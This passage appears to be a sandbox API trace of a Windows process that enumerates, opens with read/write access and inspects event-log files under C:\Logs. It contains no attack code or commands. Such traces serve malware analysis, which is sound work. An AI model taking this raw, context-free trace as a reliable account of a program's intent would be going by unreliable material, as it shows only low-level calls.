lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.855] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cAlternateFileName="MI4667~1.EVT")) returned 1 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0072.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0072.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0072.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0072.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0072.857] AreFileApisANSI () returned 1 [0072.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpUsedDefaultChar=0x0) returned 66 [0072.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0072.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0072.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.857] AreFileApisANSI () returned 1 [0072.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0072.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x825f8 [0072.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x825f8, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 66 [0072.857] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.857] GetFileType (hFile=0x428) returned 0x1 [0072.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x825f8 | out: hHeap=0x20000) returned 1 [0072.857] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.858] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.858] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.858] CloseHandle (hObject=0x428) returned 1 [0072.858] AreFileApisANSI () returned 1 [0072.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0072.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x825f8 [0072.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x825f8, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 66 [0072.858] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.858] GetFileType (hFile=0x428) returned 0x1 [0072.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x825f8 | out: hHeap=0x20000) returned 1 [0072.858] CloseHandle (hObject=0x428) returned 1 [0072.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0072.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0072.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0072.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0072.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0072.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0072.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0072.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0072.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0072.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0072.859] AreFileApisANSI () returned 1 [0072.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0072.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82c28 [0072.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 66 [0072.859] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0072.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.860] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Winlogon%4Operational.evtx", cAlternateFileName="MID6AB~1.EVT")) returned 1 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0072.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.861] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.861] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.861] AreFileApisANSI () returned 1 [0072.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx", lpUsedDefaultChar=0x0) returned 53 [0072.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0072.861] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.861] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.861] AreFileApisANSI () returned 1 [0072.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0072.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0072.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 53 [0072.861] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.861] GetFileType (hFile=0x428) returned 0x1 [0072.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.862] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.862] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.862] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.862] CloseHandle (hObject=0x428) returned 1 [0072.862] AreFileApisANSI () returned 1 [0072.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0072.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0072.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 53 [0072.862] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.862] GetFileType (hFile=0x428) returned 0x1 [0072.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.863] CloseHandle (hObject=0x428) returned 1 [0072.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.863] AreFileApisANSI () returned 1 [0072.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0072.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0072.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 53 [0072.863] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0072.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, 